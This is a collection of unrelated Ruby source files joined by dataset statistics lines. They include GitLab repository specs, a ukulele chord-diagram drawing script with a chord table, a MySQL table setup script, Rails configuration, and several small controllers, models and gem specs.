shared_examples '#ancestor?' do
let(:commit) { repository.commit }
let(:ancestor) { commit.parents.first }
it 'is an ancestor' do
expect(repository.ancestor?(ancestor.id, commit.id)).to eq(true)
end
it 'is not an ancestor' do
expect(repository.ancestor?(commit.id, ancestor.id)).to eq(false)
end
it 'returns false on nil-values' do
expect(repository.ancestor?(nil, commit.id)).to eq(false)
expect(repository.ancestor?(ancestor.id, nil)).to eq(false)
expect(repository.ancestor?(nil, nil)).to eq(false)
end
it 'returns false for invalid commit IDs' do
expect(repository.ancestor?(commit.id, Gitlab::Git::BLANK_SHA)).to eq(false)
expect(repository.ancestor?( Gitlab::Git::BLANK_SHA, commit.id)).to eq(false)
end
end
describe '#ancestor? with Gitaly enabled' do
let(:commit) { repository.commit }
let(:ancestor) { commit.parents.first }
let(:cache_key) { "ancestor:#{ancestor.id}:#{commit.id}" }
it_behaves_like '#ancestor?'
context 'caching', :request_store, :clean_gitlab_redis_cache do
it 'only calls out to Gitaly once' do
expect(repository.raw_repository).to receive(:ancestor?).once
2.times { repository.ancestor?(commit.id, ancestor.id) }
end
it 'returns the value from the request store' do
repository.__send__(:request_store_cache).write(cache_key, "it's apparent")
expect(repository.ancestor?(ancestor.id, commit.id)).to eq("it's apparent")
end
it 'returns the value from the redis cache' do
expect(repository.__send__(:cache)).to receive(:fetch).with(cache_key).and_return("it's apparent")
expect(repository.ancestor?(ancestor.id, commit.id)).to eq("it's apparent")
end
end
end
describe '#ancestor? with Rugged enabled', :enable_rugged do
it 'calls out to the Rugged implementation' do
allow_any_instance_of(Rugged).to receive(:merge_base).with(repository.commit.id, Gitlab::Git::BLANK_SHA).and_call_original
repository.ancestor?(repository.commit.id, Gitlab::Git::BLANK_SHA)
end
it_behaves_like '#ancestor?'
end
describe '#archive_metadata' do
let(:ref) { 'master' }
let(:storage_path) { '/tmp' }
let(:prefix) { [project.path, ref].join('-') }
let(:filename) { prefix + '.tar.gz' }
subject(:result) { repository.archive_metadata(ref, storage_path, append_sha: false) }
context 'with hashed storage disabled' do
let(:project) { create(:project, :repository, :legacy_storage) }
it 'uses the project path to generate the filename' do
expect(result['ArchivePrefix']).to eq(prefix)
expect(File.basename(result['ArchivePath'])).to eq(filename)
end
end
context 'with hashed storage enabled' do
it 'uses the project path to generate the filename' do
expect(result['ArchivePrefix']).to eq(prefix)
expect(File.basename(result['ArchivePath'])).to eq(filename)
end
end
end
describe 'commit cache' do
let_it_be(:project) { create(:project, :repository) }
it 'caches based on SHA' do
# Gets the commit oid, and warms the cache
oid = project.commit.id
expect(Gitlab::Git::Commit).to receive(:find).once
2.times { project.commit_by(oid: oid) }
end
it 'caches nil values' do
expect(Gitlab::Git::Commit).to receive(:find).once
2.times { project.commit_by(oid: '1' * 40) }
end
end
describe '#raw_repository' do
subject { repository.raw_repository }
it 'returns a Gitlab::Git::Repository representation of the repository' do
expect(subject).to be_a(Gitlab::Git::Repository)
expect(subject.relative_path).to eq(project.disk_path + '.git')
expect(subject.gl_repository).to eq("project-#{project.id}")
expect(subject.gl_project_path).to eq(project.full_path)
end
context 'with a wiki repository' do
let(:repository) { project.wiki.repository }
it 'creates a Gitlab::Git::Repository with the proper attributes' do
expect(subject).to be_a(Gitlab::Git::Repository)
expect(subject.relative_path).to eq(project.disk_path + '.wiki.git')
expect(subject.gl_repository).to eq("wiki-#{project.id}")
expect(subject.gl_project_path).to eq(project.full_path)
end
end
end
describe '#contributors' do
let(:author_a) { build(:author, email: '[email protected]', name: 'tiagonbotelho') }
let(:author_b) { build(:author, email: '[email protected]', name: 'Winnie') }
let(:author_c) { build(:author, email: '[email protected]', name: 'Douwe Maan') }
let(:stubbed_commits) do
[build(:commit, author: author_a),
build(:commit, author: author_a),
build(:commit, author: author_b),
build(:commit, author: author_c),
build(:commit, author: author_c),
build(:commit, author: author_c)]
end
let(:order_by) { nil }
let(:sort) { nil }
before do
allow(repository).to receive(:commits).with(nil, limit: 2000, offset: 0, skip_merges: true).and_return(stubbed_commits)
end
subject { repository.contributors(order_by: order_by, sort: sort) }
def expect_contributors(*contributors)
expect(subject.map(&:email)).to eq(contributors.map(&:email))
end
it 'returns the array of Gitlab::Contributor for the repository' do
expect_contributors(author_a, author_b, author_c)
end
context 'order_by email' do
let(:order_by) { 'email' }
context 'asc' do
let(:sort) { 'asc' }
it 'returns all the contributors ordered by email asc case insensitive' do
expect_contributors(author_c, author_b, author_a)
end
end
context 'desc' do
let(:sort) { 'desc' }
it 'returns all the contributors ordered by email desc case insensitive' do
expect_contributors(author_a, author_b, author_c)
end
end
end
context 'order_by name' do
let(:order_by) { 'name' }
context 'asc' do
let(:sort) { 'asc' }
it 'returns all the contributors ordered by name asc case insensitive' do
expect_contributors(author_c, author_a, author_b)
end
end
context 'desc' do
let(:sort) { 'desc' }
it 'returns all the contributors ordered by name desc case insensitive' do
expect_contributors(author_b, author_a, author_c)
end
end
end
context 'order_by commits' do
let(:order_by) { 'commits' }
context 'asc' do
let(:sort) { 'asc' }
it 'returns all the contributors ordered by commits asc' do
expect_contributors(author_b, author_a, author_c)
end
end
context 'desc' do
let(:sort) { 'desc' }
it 'returns all the contributors ordered by commits desc' do
expect_contributors(author_c, author_a, author_b)
end
end
end
context 'invalid ordering' do
let(:order_by) { 'unknown' }
it 'returns the contributors unsorted' do
expect_contributors(author_a, author_b, author_c)
end
end
context 'invalid sorting' do
let(:order_by) { 'name' }
let(:sort) { 'unknown' }
it 'returns the contributors unsorted' do
expect_contributors(author_a, author_b, author_c)
end
end
end
describe '#merge_base' do
let_it_be(:project) { create(:project, :repository) }
subject(:repository) { project.repository }
it 'only makes one gitaly call' do
expect(Gitlab::GitalyClient).to receive(:call).once.and_call_original
repository.merge_base('master', 'fix')
end
end
describe '#create_if_not_exists' do
let(:project) { create(:project) }
let(:repository) { project.repository }
it 'creates the repository if it did not exist' do
expect { repository.create_if_not_exists }.to change { repository.exists? }.from(false).to(true)
end
it 'returns true' do
expect(repository.create_if_not_exists).to eq(true)
end
it 'calls out to the repository client to create a repo' do
expect(repository.raw.gitaly_repository_client).to receive(:create_repository)
repository.create_if_not_exists
end
context 'it does nothing if the repository already existed' do
let(:project) { create(:project, :repository) }
it 'does nothing if the repository already existed' do
expect(repository.raw.gitaly_repository_client).not_to receive(:create_repository)
repository.create_if_not_exists
end
it 'returns nil' do
expect(repository.create_if_not_exists).to be_nil
end
end
context 'when the repository exists but the cache is not up to date' do
let(:project) { create(:project, :repository) }
it 'does not raise errors' do
allow(repository).to receive(:exists?).and_return(false)
expect(repository.raw).to receive(:create_repository).and_call_original
expect { repository.create_if_not_exists }.not_to raise_error
end
it 'returns nil' do
expect(repository.create_if_not_exists).to be_nil
end
end
end
describe '#create_from_bundle' do
let(:project) { create(:project) }
let(:repository) { project.repository }
let(:valid_bundle_path) { File.join(Dir.tmpdir, "repo-#{SecureRandom.hex}.bundle") }
let(:raw_repository) { repository.raw }
before do
allow(raw_repository).to receive(:create_from_bundle).and_return({})
end
after do
FileUtils.rm_rf(valid_bundle_path)
end
it 'calls out to the raw_repository to create a repo from bundle' do
expect(raw_repository).to receive(:create_from_bundle)
repository.create_from_bundle(valid_bundle_path)
end
it 'calls after_create' do
expect(repository).to receive(:after_create)
repository.create_from_bundle(valid_bundle_path)
end
context 'when exception is raised' do
before do
allow(raw_repository).to receive(:create_from_bundle).and_raise(::Gitlab::Git::BundleFile::InvalidBundleError)
end
it 'after_create is not executed' do
expect(repository).not_to receive(:after_create)
expect {repository.create_from_bundle(valid_bundle_path)}.to raise_error(::Gitlab::Git::BundleFile::InvalidBundleError)
end
end
end
describe "#blobs_metadata" do
let_it_be(:project) { create(:project, :repository) }
let(:repository) { project.repository }
def expect_metadata_blob(thing)
expect(thing).to be_a(Blob)
expect(thing.data).to be_empty
end
it "returns blob metadata in batch for HEAD" do
result = repository.blobs_metadata(["bar/branch-test.txt", "README.md", "does/not/exist"])
expect_metadata_blob(result.first)
expect_metadata_blob(result.second)
expect(result.size).to eq(2)
end
it "returns blob metadata for a specified ref" do
result = repository.blobs_metadata(["files/ruby/feature.rb"], "feature")
expect_metadata_blob(result.first)
end
it "performs a single gitaly call", :request_store do
expect { repository.blobs_metadata(["bar/branch-test.txt", "readme.txt", "does/not/exist"]) }
.to change { Gitlab::GitalyClient.get_request_count }.by(1)
end
end
describe '#submodule_links' do
it 'returns an instance of Gitlab::SubmoduleLinks' do
expect(repository.submodule_links).to be_a(Gitlab::SubmoduleLinks)
end
end
describe '#lfs_enabled?' do
let_it_be(:project) { create(:project, :repository, lfs_enabled: true) }
subject { repository.lfs_enabled? }
context 'for a project repository' do
let(:repository) { project.repository }
it 'returns true when LFS is enabled' do
stub_lfs_setting(enabled: true)
is_expected.to be_truthy
end
it 'returns false when LFS is disabled' do
stub_lfs_setting(enabled: false)
is_expected.to be_falsy
end
end
context 'for a project wiki repository' do
let(:repository) { project.wiki.repository }
it 'returns true when LFS is enabled' do
stub_lfs_setting(enabled: true)
is_expected.to be_truthy
end
it 'returns false when LFS is disabled' do
stub_lfs_setting(enabled: false)
is_expected.to be_falsy
end
end
context 'for a project snippet repository' do
let(:snippet) { create(:project_snippet, project: project) }
let(:repository) { snippet.repository }
it 'returns false when LFS is enabled' do
stub_lfs_setting(enabled: true)
is_expected.to be_falsy
end
end
context 'for a personal snippet repository' do
let(:snippet) { create(:personal_snippet) }
let(:repository) { snippet.repository }
it 'returns false when LFS is enabled' do
stub_lfs_setting(enabled: true)
is_expected.to be_falsy
end
end
end
end
| 30.817223 | 150 | 0.662738 |
911549425b6793c8e833fc93389b31582989ee38 | 9,286 | require 'rubygems'
require 'RMagick'
# This script draws ukulele chords for use in
# tabs or elsewhere
#
# Author:: Tom MacWright (mailto:[email protected])
# Copyright:: Copyright (c) 2008 Tom MacWright
# License:: BSD License
CHORD_LIST = {
'C' => [3, 0, 0, 0],
'Cm' => [3, 3, 3, 0],
'C7' => [1, 0, 0, 0],
'CM7' => [2, 0, 0, 0],
'Cm7' => [3, 3, 3, 3],
'Cdim' => [3, 2, 3, 2],
'Cm7(b5)' => [3, 2, 3, 3],
'Caug' => [3, 0, 0, 1],
'Csus4' => [3, 3, 5, 5],
'C6' => [0, 0, 0, 0],
'C7(9)' => [1, 0, 2, 0],
'CM7(9)' => [2, 0, 2, 0],
'CmM7' => [3, 3, 3, 4],
'Cadd9' => [3, 0, 2, 0],
'C#' => [4, 1, 1, 1],
'C#m' => [4, 4, 4, 1],
'C#7' => [2, 1, 1, 1],
'C#M7' => [3, 1, 1, 1],
'C#m7' => [2, 0, 1, 1],
'C#dim' => [1, 0, 1, 0],
'C#m7(b5)' => [3, 2, 3, 3],
'C#aug' => [0, 1, 1, 2],
'C#sus4' => [2, 2, 1, 1],
'C#6' => [1, 1, 1, 1],
'C#7(9)' => [2, 1, 3, 1],
'C#M7(9)' => [3, 1, 3, 1],
'C#mM7' => [3, 0, 1, 1],
'C#add9' => [4, 1, 3, 1],
'Db' => [4, 1, 1, 1],
'Dbm' => [4, 4, 4, 1],
'Db7' => [2, 1, 1, 1],
'DbM7' => [3, 1, 1, 1],
'Dbm7' => [2, 0, 1, 1],
'Dbdim' => [1, 0, 1, 0],
'Dbm7(b5)' => [3, 2, 3, 3],
'Dbaug' => [0, 1, 1, 2],
'Dbsus4' => [2, 2, 1, 1],
'Db6' => [1, 1, 1, 1],
'Db7(9)' => [2, 1, 3, 1],
'DbM7(9)' => [3, 1, 3, 1],
'DbmM7' => [3, 0, 1, 1],
'Dbadd9' => [4, 1, 3, 1],
'D' => [0, 2, 2, 2],
'Dm' => [0, 1, 2, 2],
'D7' => [3, 2, 2, 2],
'DM7' => [4, 2, 2, 2],
'Dm7' => [3, 1, 2, 2],
'Ddim' => [2, 1, 2, 1],
'Dm7(b5)' => [3, 1, 2, 1],
'Daug' => [1, 2, 2, 3],
'Dsus4' => [0, 3, 2, 2],
'D6' => [2, 2, 2, 2],
'D7(9)' => [3, 2, 4, 2],
'DM7(9)' => [4, 2, 4, 2],
'DmM7' => [4, 1, 2, 2],
'Dadd9' => [5, 2, 4, 2],
'D#' => [1, 3, 3, 0],
'D#m' => [1, 2, 3, 3],
'D#7' => [4, 3, 3, 3],
'D#M7' => [5, 3, 3, 3],
'D#m7' => [4, 2, 3, 3],
'D#dim' => [3, 2, 3, 2],
'D#m7(b5)' => [4, 2, 3, 2],
'D#aug' => [2, 3, 3, 0],
'D#sus4' => [1, 4, 3, 3],
'D#6' => [4, 4, 4, 4],
'D#7(9)' => [1, 1, 1, 0],
'D#M7(9)' => [1, 1, 2, 0],
'D#mM7' => [5, 2, 3, 3],
'D#add9' => [1, 1, 3, 0],
'Eb' => [1, 3, 3, 0],
'Ebm' => [1, 2, 3, 3],
'Eb7' => [4, 3, 3, 3],
'EbM7' => [5, 3, 3, 3],
'Ebm7' => [4, 2, 3, 3],
'Ebdim' => [3, 2, 3, 2],
'Ebm7(b5)' => [4, 2, 3, 2],
'Ebaug' => [2, 3, 3, 0],
'Ebsus4' => [1, 4, 3, 3],
'Eb6' => [4, 4, 4, 4],
'Eb7(9)' => [1, 1, 1, 0],
'EbM7(9)' => [1, 1, 2, 0],
'EbmM7' => [5, 2, 3, 3],
'Ebadd9' => [1, 1, 3, 0],
'E' => [2, 4, 4, 4],
'Em' => [2, 3, 4, 0],
'E7' => [2, 0, 2, 1],
'EM7' => [2, 0, 3, 1],
'Em7' => [2, 0, 2, 0],
'Edim' => [1, 0, 1, 0],
'Em7(b5)' => [1, 0, 2, 0],
'Eaug' => [3, 0, 0, 1],
'Esus4' => [2, 5, 4, 4],
'E6' => [2, 0, 1, 1],
'E7(9)' => [2, 2, 2, 1],
'EM7(9)' => [2, 2, 3, 1],
'EmM7' => [2, 0, 3, 0],
'Eadd9' => [2, 2, 4, 1],
'F' => [0, 1, 0, 2],
'Fm' => [3, 1, 0, 1],
'F7' => [3, 1, 3, 2],
'FM7' => [0, 0, 5, 5],
'Fm7' => [3, 1, 3, 1],
'Fdim' => [2, 1, 2, 1],
'Fm7(b5)' => [2, 1, 3, 1],
'Faug' => [0, 1, 1, 2],
'Fsus4' => [1, 1, 0, 3],
'F6' => [3, 1, 2, 2],
'F7(9)' => [3, 3, 3, 2],
'FM7(9)' => [0, 0, 0, 0],
'FmM7' => [3, 1, 4, 1],
'Fadd9' => [0, 1, 0, 0],
'F#' => [1, 2, 1, 3],
'F#m' => [0, 2, 1, 2],
'F#7' => [4, 2, 4, 3],
'F#M7' => [4, 2, 5, 3],
'F#m7' => [4, 2, 4, 2],
'F#dim' => [3, 2, 3, 2],
'F#m7(b5)' => [3, 2, 4, 2],
'F#aug' => [1, 2, 2, 3],
'F#sus4' => [4, 2, 4, 4],
'F#6' => [4, 2, 3, 3],
'F#7(9)' => [4, 4, 4, 3],
'F#M7(9)' => [1, 1, 1, 1],
'F#mM7' => [4, 2, 5, 2],
'F#add9' => [1, 2, 1, 1],
'Gb' => [1, 2, 1, 3],
'Gbm' => [0, 2, 1, 2],
'Gb7' => [4, 2, 4, 3],
'GbM7' => [4, 2, 5, 3],
'Gbm7' => [4, 2, 4, 2],
'Gbdim' => [3, 2, 3, 2],
'Gbm7(b5)' => [3, 2, 4, 2],
'Gbaug' => [1, 2, 2, 3],
'Gbsus4' => [4, 2, 4, 4],
'Gb6' => [4, 2, 3, 3],
'Gb7(9)' => [4, 4, 4, 3],
'GbM7(9)' => [1, 1, 1, 1],
'GbmM7' => [4, 2, 5, 2],
'Gbadd9' => [1, 2, 1, 1],
'G' => [2, 3, 2, 0],
'Gm' => [1, 3, 2, 0],
'G7' => [2, 1, 2, 0],
'GM7' => [2, 2, 2, 0],
'Gm7' => [1, 1, 2, 0],
'Gdim' => [1, 0, 1, 0],
'Gm7(b5)' => [1, 1, 1, 0],
'Gaug' => [2, 3, 3, 0],
'Gsus4' => [3, 3, 2, 0],
'G6' => [2, 0, 2, 0],
'G7(9)' => [2, 1, 2, 2],
'GM7(9)' => [2, 2, 2, 2],
'GmM7' => [5, 3, 6, 3],
'Gadd9' => [2, 3, 2, 2],
'G#' => [3, 4, 3, 5],
'G#m' => [2, 4, 3, 1],
'G#7' => [3, 2, 3, 1],
'G#M7' => [3, 3, 3, 1],
'G#m7' => [2, 2, 3, 1],
'G#dim' => [2, 1, 2, 1],
'G#m7(b5)' => [2, 2, 2, 1],
'G#aug' => [3, 0, 0, 1],
'G#sus4' => [4, 4, 3, 1],
'G#6' => [3, 1, 3, 1],
'G#7(9)' => [3, 2, 3, 3],
'G#M7(9)' => [3, 3, 3, 3],
'G#mM7' => [6, 4, 7, 4],
'G#add9' => [3, 4, 3, 3],
'Ab' => [3, 4, 3, 5],
'Abm' => [2, 4, 3, 1],
'Ab7' => [3, 2, 3, 1],
'AbM7' => [3, 3, 3, 1],
'Abm7' => [2, 2, 3, 1],
'Abdim' => [2, 1, 2, 1],
'Abm7(b5)' => [2, 2, 2, 1],
'Abaug' => [3, 0, 0, 1],
'Absus4' => [4, 4, 3, 1],
'Ab6' => [3, 1, 3, 1],
'Ab7(9)' => [3, 2, 3, 3],
'AbM7(9)' => [3, 3, 3, 3],
'AbmM7' => [6, 4, 7, 4],
'Abadd9' => [3, 4, 3, 3],
'A' => [0, 0, 1, 2],
'Am' => [0, 0, 0, 2],
'A7' => [0, 0, 1, 0],
'AM7' => [0, 0, 1, 1],
'Am7' => [0, 0, 0, 0],
'Adim' => [3, 2, 3, 2],
'Am7(b5)' => [3, 3, 3, 2],
'Aaug' => [0, 1, 1, 2],
'Asus4' => [0, 0, 2, 2],
'A6' => [4, 2, 4, 2],
'A7(9)' => [2, 3, 1, 2],
'AM7(9)' => [2, 4, 1, 2],
'AmM7' => [0, 0, 0, 1],
'Aadd9' => [2, 0, 1, 2],
'A#' => [1, 1, 2, 3],
'A#m' => [1, 1, 1, 3],
'A#7' => [1, 1, 2, 1],
'A#M7' => [0, 1, 2, 3],
'A#m7' => [1, 1, 1, 1],
'A#dim' => [1, 0, 1, 0],
'A#m7(b5)' => [1, 0, 1, 1],
'A#aug' => [1, 2, 2, 3],
'A#sus4' => [1, 1, 3, 3],
'A#6' => [1, 1, 2, 0],
'A#7(9)' => [3, 4, 2, 3],
'A#M7(9)' => [5, 5, 5, 5],
'A#mM7' => [1, 1, 1, 2],
'A#add9' => [3, 1, 2, 3],
'Bb' => [1, 1, 2, 3],
'Bbm' => [1, 1, 1, 3],
'Bb7' => [1, 1, 2, 1],
'BbM7' => [0, 1, 2, 3],
'Bbm7' => [1, 1, 1, 1],
'Bbdim' => [1, 0, 1, 0],
'Bbm7(b5)' => [1, 0, 1, 1],
'Bbaug' => [1, 2, 2, 3],
'Bbsus4' => [1, 1, 3, 3],
'Bb6' => [1, 1, 2, 0],
'Bb7(9)' => [3, 4, 2, 3],
'BbM7(9)' => [5, 5, 5, 5],
'BbmM7' => [1, 1, 1, 2],
'Bbadd9' => [3, 1, 2, 3],
'B' => [2, 2, 3, 4],
'Bm' => [2, 2, 2, 4],
'B7' => [2, 2, 3, 2],
'BM7' => [1, 2, 3, 4],
'Bm7' => [2, 2, 2, 2],
'Bdim' => [2, 1, 2, 1],
'Bm7(b5)' => [2, 1, 2, 2],
'Baug' => [2, 3, 3, 4],
'Bsus4' => [2, 2, 4, 4],
'B6' => [2, 2, 3, 1],
'B7(9)' => [4, 2, 3, 2],
'BM7(9)' => [4, 1, 3, 3],
'BmM7' => [2, 2, 2, 3],
'Badd9' => [4, 2, 3, 4],
}
NOTES = ['C', 'C#', 'D', 'D#', 'E', 'F', 'F#', 'G', 'G#', 'A', 'A#', 'B']
STRINGS = ['G', 'C', 'E', 'A']
def draw_chord(chord_name)
# chord_name.gsub!("x", "#")
if not FileTest.exist? "/home/tom/ukulele/static/chords/"+chord_name+".png"
chord(chord_name)
end
end
def chord(chord_name)
return generate(chord_name, get_flets(chord_name.gsub("x", "#")))
end
def get_flets(chord_name)
if CHORD_LIST.has_key? chord_name then
return CHORD_LIST[chord_name].reverse
else
chord_name.sub!("maj", "M")
if CHORD_LIST.has_key? chord_name then
return CHORD_LIST[chord_name].reverse
end
end
end
def generate(chord, flets)
# Frets are 10px high
# The strings are 12px apart
height = (flets.max * 10) + 60
width = ((STRINGS.length - 1) * 12) + 16
last_fret = 15 + ((flets.max + 1) * 10)
last_string = 5 + ((STRINGS.length - 1) * 12)
canvas = Magick::Image.new(width, height)
gc = Magick::Draw.new
gc.stroke('gray25')
(0..(STRINGS.length - 1)).each do |string|
gc.line(5 + 12 * string, 15, 5 + 12 * string, last_fret)
end
(0..(flets.max + 1)).each do |fret|
if fret == 0
gc.stroke_width(3)
else
gc.stroke_width(1)
end
gc.line(5, 15 + 10 * fret, last_string, 15 + 10 * fret)
end
gc.stroke('transparent')
i = 0
flets.each { |f|
if f > 0 then
gc.circle(
5 + 12 * i,
15 + 10 * f,
8 + 12 * i,
18 + 10 * f
)
end
a = NOTES.index(STRINGS[i]) + f
n = a % NOTES.length
gc.font_family = "arial"
gc.pointsize = 6
gc.text(1 + 13 * i, last_fret + 14, NOTES[n])
i = i + 1
}
gc.font_weight = 100
gc.pointsize = 11
gc.text(0, 10, chord.gsub("x", "#"))
gc.draw(canvas)
canvas.write('static/chords/'+chord+".png")
end
| 28.660494 | 77 | 0.326513 |
387984d89a3ef103e948576ebfd0c6849794820c | 2,203 | #!/usr/bin/env ruby
# require './lib/db.rb'
require "inifile"
require 'dbi'
class IniLoad
def initialize
@ini = IniFile.load("./sclman.conf")
end
def search( section, name )
val = @ini[section][name]
return "#{val}"
end
end
ini = IniLoad.new
dbname = ini.search("DB", "dbname")
dbuser = ini.search("DB", "dbuser")
dbpass = ini.search("DB", "dbpass")
module ConnectDb
def self.connect()
ini = IniLoad.new
dbname = ini.search("DB", "dbname")
dbuser = ini.search("DB", "dbuser")
dbpass = ini.search("DB", "dbpass")
dbconn = DBI.connect("DBI:Mysql:#{dbname}:localhost", "#{dbuser}", "#{dbpass}")
begin
result = yield dbconn
rescue DBI::DatabaseErro => e
puts "An error occurred"
puts "Error code: #{e.err}"
puts "Error message: #{e.errstr}"
ensure
dbconn.disconnect if dbconn
end
rescue Errno::ECONNREFUSED
end
end
def create_table(tablename)
if tablename == "lbmembers" then
ConnectDb.connect() do |sock|
sock.do("CREATE TABLE #{tablename} (
id INT UNSIGNED NOT NULL AUTO_INCREMENT,
instancename CHAR(20) NOT NULL,
ipaddr CHAR(20) NOT NULL,
groupname CHAR(20) NOT NULL,
created_date CHAR(20) NOT NULL,
updated_date CHAR(20) NOT NULL,
PRIMARY KEY (id))")
end
elsif tablename == "counter" then
ConnectDb.connect() do |sock|
sock.do("CREATE TABLE #{tablename} (
id INT UNSIGNED NOT NULL AUTO_INCREMENT,
groupname CHAR(20) NOT NULL,
count INT NOT NULL,
basic_count INT NOT NULL,
created_date CHAR(20) NOT NULL,
updated_date CHAR(20) NOT NULL,
PRIMARY KEY (id))")
end
else
puts "error was occoured. table name should be 'lbmembers' or 'counter'."
end
end
puts "input mysql root password twice."
system("mysql -u root -p -e \"CREATE DATABASE #{dbname};\"")
system("mysql -u root -p -e \"GRANT ALL ON #{dbname}.* TO #{dbuser}@localhost IDENTIFIED BY \'#{dbpass}\';\"")
create_table("lbmembers")
create_table("counter")
| 28.24359 | 110 | 0.589197 |
01045b14a9e1191dccf791b043245cc34be84f8b | 713 | $:.push File.expand_path("../lib", __FILE__)
# Maintain your gem's version:
require "record_revision/version"
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = "record_revision"
s.version = RecordRevision::VERSION
s.authors = ["ponpocopocopon"]
s.email = [""]
s.homepage = ""
s.summary = "record the difference information."
s.description = "this plugin can automatically record the difference information to data table."
s.files = Dir["{app,config,db,lib}/**/*", "MIT-LICENSE", "Rakefile", "README.rdoc"]
s.test_files = Dir["test/**/*"]
#s.add_dependency "rails", "~> 4.0.0"
#s.add_development_dependency "sqlite3"
end
| 32.409091 | 98 | 0.667602 |
08fbd379616625bbe5958bc020376e7097a67718 | 3,459 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
#Bundler.require(*Rails.groups)
Bundler.require(:default, Rails.env)
# IMS-LTI
OAUTH_10_SUPPORT = true
require 'oauth/request_proxy/action_dispatch_request'
module SistemaTcc
class Application < Rails::Application
#config.active_record.raise_in_transactional_callbacks = true
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
config.autoload_paths += %W(#{config.root}/lib)
config.autoload_paths += %W(#{config.root}/lib/modules)
config.autoload_paths += %W(#{config.root}/app/models/ckeditor)
config.autoload_paths += %W(#{config.root}/app/models/concerns)
config.autoload_paths += %W(#{config.root}/app/controllers/concerns)
config.autoload_paths += %W(#{config.root}/app/validations)
# config.autoload_paths += %W(#{config.root}/lib/workers)
# config.eager_load_paths += ["#{config.root}/lib/workers"]
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
config.i18n.available_locales = [:en, :"pt-BR"]
config.i18n.enforce_available_locales = false
# config.i18n.enforce_available_locales = true
config.i18n.load_path += Dir[Rails.root.join('config', 'locales', '*.{rb,yml}').to_s]
config.i18n.default_locale = :'pt-BR'
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = "utf-8"
# Enable escaping HTML in JSON.
config.active_support.escape_html_entities_in_json = true
# Use SQL instead of Active Record's schema dumper when creating the database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
# Configura os paths para os partials dos workwers do sidekiq para a impressão em bloco
config.paths['app/views'].unshift("#{Rails.root}/app/views/tccs")
config.generators do |g|
g.test_framework :rspec, fixture: true
g.fixture_replacement :fabrication
end
# config/application.rb
# => Markdown (for CKEditor)
# => https://github.com/rails/sprockets/blob/99444c0a280cc93e33ddf7acfe961522dec3dcf5/guides/extending_sprockets.md#register-mime-types
config.before_initialize do |app|
Sprockets.register_mime_type 'text/markdown', extensions: ['.md']
end
end
end
ActiveRecord::SessionStore::Session.serializer = :marshal
| 43.78481 | 139 | 0.730558 |
f8a1f3e3b3c6392d1bf75706c106f67a2ca700dc | 1,060 | class SponsorsController < ApplicationController
before_action :set_sponsor, only: [:update, :edit, :show, :destroy]
before_action :authorize_sponsor, except: [:index, :new, :create]
def index
@sponsors = Sponsor.all
authorize @sponsors
end
def show
end
def new
@sponsor = Sponsor.new
authorize_sponsor
end
def create
@sponsor = Sponsor.new(sponsor_params)
authorize_sponsor
if @sponsor.save
redirect_to sponsor_path(@sponsor)
else
render :new
end
end
def edit
end
def update
if @sponsor.update(sponsor_params)
redirect_to sponsor_path(@sponsor)
else
render :new
end
end
def destroy
@sponsor.destroy
redirect_to sponsors_path
end
private
def sponsor_params
permitted = [:name, :image, :order, :imagelink] + Sponsor.globalize_attribute_names
params.require(:sponsor).permit(permitted)
end
def set_sponsor
@sponsor = Sponsor.find(params[:id])
end
def authorize_sponsor
authorize @sponsor
end
end
| 18.275862 | 87 | 0.679245 |
03b409c4aa91a1a7958f437cac3148e3b8e6f797 | 1,559 | dir = File.dirname(__FILE__)
require File.expand_path("#{dir}/../helper/spec_helper")
describe "an RogueGemFinder instance" do
before(:each) do
GemInstaller::TestGemHome.use
@registry = GemInstaller::create_registry
@rogue_gem_finder = @registry.rogue_gem_finder
@gem_command_manager = @registry.gem_command_manager
@rogue_gem = sample_gem
@legit_gem = sample_dependent_multiplatform_gem
@legit_gem.install_options << "--include-dependencies"
@mock_output_proxy = mock("Mock OutputProxy")
@rogue_gem_finder.output_proxy = @mock_output_proxy
end
# This is a hack to make the suite pass under Rubygems <= 1.3.0 (maybe < 1.3.0?)
# See http://thewoolleyweb.lighthouseapp.com/projects/11580-geminstaller/tickets/38-test-failures-under-older-rubygems-due-to-invalid-spec-warnings
if GemInstaller::RubyGemsVersionChecker.matches?('> 1.3.0')
it "should return yaml for all locally installed gems which are not matched by one of the config gems passed in" do
@gem_command_manager.install_gem(@rogue_gem)
# legit gem will also install a dependency, which should be detected as a valid gem in the config,
# since it's parent is in the config
@gem_command_manager.install_gem(@legit_gem)
@mock_output_proxy.should_receive(:sysout)
config_file_paths = []
output = @rogue_gem_finder.print_rogue_gems([@legit_gem], config_file_paths)
output.should match(/#{@rogue_gem.name}/)
end
end
after(:each) do
GemInstaller::TestGemHome.uninstall_all_test_gems
end
end
| 38.02439 | 149 | 0.744067 |
e2392b239d30c264342fefe1d90a8e2702683156 | 794 | module Railspress
class Category < Taxonomy
has_many :sub_categories, class_name: Railspress::Category.name, foreign_key: :parent, primary_key: :id
def self.cloud
cats = all.reject{|r| r.posts.empty?}
total_posts = cats.inject(0){|sum, t| sum += t.count}
cats.map{|t| {category: t, size: 1.0 + (t.count / total_posts.to_f * 2)}}.sort_by{|sb| sb[:category].slug}
end
def self.find_or_create category_name, parent = nil
raise "category name can't be blank" if category_name.blank?
parent_id = parent.try(:id).to_i
category = joins(:term).where(wp_terms: {name: category_name}, parent: parent_id).first
category ||= create!(description: category_name, term_id: Term.create!(name: category_name).id, parent: parent_id)
end
end
end | 44.111111 | 120 | 0.685139 |
acfdd0fd983d9b2852c9051a211e925a910372c1 | 3,237 | # frozen_string_literal: true
# == Schema Information
#
# Table name: training_slides
#
